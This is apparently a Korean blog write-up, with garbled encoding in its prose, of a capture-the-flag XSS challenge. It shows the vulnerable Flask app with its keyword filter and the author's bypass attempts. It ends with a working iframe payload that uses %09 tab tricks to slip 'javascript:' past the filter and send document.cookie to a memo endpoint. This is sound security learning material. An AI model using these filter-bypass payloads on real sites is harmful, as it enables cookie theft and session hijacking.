[2025-07-31] XSS Bypass filtering advanced
๐ฆฅ ๋ณธ๋ฌธ
- app.py
#!/usr/bin/python3
from flask import Flask, request, render_template
from selenium import webdriver
from selenium.webdriver.chrome.service import Service
import urllib
import os
app = Flask(__name__)
app.secret_key = os.urandom(32)
try:
FLAG = open("./flag.txt", "r").read()
except:
FLAG = "[**FLAG**]"
def read_url(url, cookie={"name": "name", "value": "value"}):
cookie.update({"domain": "127.0.0.1"})
try:
service = Service(executable_path="/chromedriver")
options = webdriver.ChromeOptions()
for _ in [
"headless",
"window-size=1920x1080",
"disable-gpu",
"no-sandbox",
"disable-dev-shm-usage",
]:
options.add_argument(_)
driver = webdriver.Chrome(service=service, options=options)
driver.implicitly_wait(3)
driver.set_page_load_timeout(3)
driver.get("http://127.0.0.1:8000/")
driver.add_cookie(cookie)
driver.get(url)
except Exception as e:
driver.quit()
# return str(e)
return False
driver.quit()
return True
def check_xss(param, cookie={"name": "name", "value": "value"}):
url = f"http://127.0.0.1:8000/vuln?param={urllib.parse.quote(param)}"
return read_url(url, cookie)
def xss_filter(text):
_filter = ["script", "on", "javascript"]
for f in _filter:
if f in text.lower():
return "filtered!!!"
advanced_filter = ["window", "self", "this", "document", "location", "(", ")", "&#"]
for f in advanced_filter:
if f in text.lower():
return "filtered!!!"
return text
@app.route("/")
def index():
return render_template("index.html")
@app.route("/vuln")
def vuln():
param = request.args.get("param", "")
param = xss_filter(param)
return param
@app.route("/flag", methods=["GET", "POST"])
def flag():
if request.method == "GET":
return render_template("flag.html")
elif request.method == "POST":
param = request.form.get("param")
if not check_xss(param, {"name": "flag", "value": FLAG.strip()}):
return '<script>alert("wrong??");history.go(-1);</script>'
return '<script>alert("good");history.go(-1);</script>'
memo_text = ""
@app.route("/memo")
def memo():
global memo_text
text = request.args.get("memo", "")
memo_text += text + "\n"
return render_template("memo.html", memo=memo_text)
app.run(host="0.0.0.0", port=8000)
๊ธฐ์กด์ ํ์๋ XSS ๋ฌธ์ ์ ๊ฐ์ ์ ํ์ด๋ค. ํ์ง๋ง ํํฐ๊ฐ ๋ ์ ๊ทธ๋ ์ด๋ ๋๋ค.
- ๋๋ธ ์ธ์ฝ๋ฉ์ผ๋ก ์ธํ ์ฐํ
<%73cript>l%6Fcation.href="/memo?memo=" + d%6Fcument.cookie</%73cript>
Selinum์ด ์๋ ์ธ์ฝ๋ฉ์ ํ์ง ์๋ ๋ค๋ ์ ์ ์ด์ฉํ์ฌ ๋๋ธ ์ธ์ฝ๋ฉ์ ๋ ธ๋ ธ๋ ๋ฐ, ์๋๋ค
url = f"http://127.0.0.1:8000/vuln?param={urllib.parse.quote(param)}
ํ์ง๋ง urllib.parse.quote() ์์ ์ธ์ฝ๋ฉ์ด ๋๋ค๊ณ ํ๋ค.
- ๋ค์๊ณผ ๊ฐ์ 3๊ฐ์ ์ฝ๋๋ฅผ ์ง์ด ๋ฃ์๋ค
<s%09cript>l%09ocation.href="/memo?memo=" + d%09ocument.cookie</s%09cript>
<iframe src="j\tavascript:l\tocation.href='/memo?memo=' + d\tocument.cookie">
<iframe src="j%09avascript:l%09ocation.href='/memo?memo=' + d%09ocument.cookie">
- ์ฒซ๋ฒ์งธ ์ฝ๋๋ ํ๊ทธ ์์ฒด๊ฐ ๊นจ์ ธ์ HTML ํ์๊ฐ ๋ฌด์๋ฅผ ํ๋ค.
- ๋๋ฒ์งธ ์ฝ๋์ ์ธ๋ฒ์งธ ์ฝ๋์ ์ฐจ์ด
- 2๋ฒ์งธ ์ฝ๋๋ HTML์ด
<iframe src="j[TAB]avascript">๋ก ํ๋จ. src ์์ฑ์์ ํญ ๋ฌธ์ ํฌํจ๋ URL์ ์ ํจํ์ง ์๋ค๊ณ ํ๋จ โ ๋ฌด์ โ XSS ์คํจ - 3๋ฒ์งธ ์ฝ๋๋
<iframe src="j%09avascript">๋ก ํ๋จ. HTML์ด %09๋ฅผ ๋์ฝ๋ฉ ํ๋ ๊ณผ์ ์์ ํญ์ด๋ผ ํ๋จ ํ ์ ๊ฑฐ โjavascript:๋ณต์
- 2๋ฒ์งธ ์ฝ๋๋ HTML์ด
ํ์ด ๋ฐ ์ ๋ต
<iframe src="j%09avascript:l%09ocation.href='/memo?memo=' + d%09ocument.cookie">
Leave a comment